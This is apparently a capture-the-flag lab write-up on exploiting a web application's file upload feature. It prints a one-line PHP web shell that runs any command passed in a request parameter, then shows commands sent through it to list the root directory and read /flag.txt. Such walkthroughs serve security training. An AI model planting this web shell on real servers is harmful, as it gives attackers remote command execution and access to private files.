Upload Exploitation

Try to exploit the upload feature to upload a web shell and get the content of /flag.txt

This lab consists in obtaining a web shell access through the web application. There may be multiple ways to this, so I'll just how I did it.

First create a simple custom web shell:

<?php system($_REQUEST['cmd']); ?>

Access the web application and upload the web shell.

After the file has been uploaded, click on Download File and you will be redirected to this page. We are currently accessing the file we just uploaded. Since the function is expecting a command we have to write the cmd parameter.

?cmd=pwd

Since we passed the pwd command, we got the output that we were expecing. So we can confirm we got a web shell access.

Now all we have to do is search for the flag, which in this case is in the root directory.

?cmd=ls /

Here it is! Now let's see the content of the flag:

?cmd=cat /flag.txt

And we got it!